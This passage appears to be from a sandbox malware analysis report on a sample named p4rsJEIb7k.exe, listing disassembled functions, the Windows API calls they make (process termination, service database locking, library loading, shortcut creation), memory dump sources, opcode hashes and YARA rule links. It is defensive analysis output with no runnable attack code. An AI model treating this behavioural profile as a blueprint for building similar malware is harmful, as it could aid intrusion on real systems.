                                                                                                                • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1035833867-0
                                                                                                                • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                  • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 00436055
                                                                                                                • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                • GetLastError.KERNEL32 ref: 00436081
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1690418490-0
                                                                                                                • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                                                • String ID: .lnk$HH
                                                                                                                • API String ID: 948891078-3121654589
                                                                                                                • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                Function 0044849C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                • IsMenu.USER32(?), ref: 0044857B
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
                                                                                                                • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                • Opcode Fuzzy Hash: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
                                                                                                                • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                Function 004366BE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                • String ID: \
                                                                                                                • API String ID: 2267087916-2967466578
                                                                                                                • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                                • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                                • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,77022EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,77022EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1795658109-438819550
                                                                                                                • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                Function 0045D321 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: %lu$HH
                                                                                                                • API String ID: 2507767853-3924996404
                                                                                                                • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                Function 00452788 Relevance: 7.8, APIs: 5, Instructions: 344COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
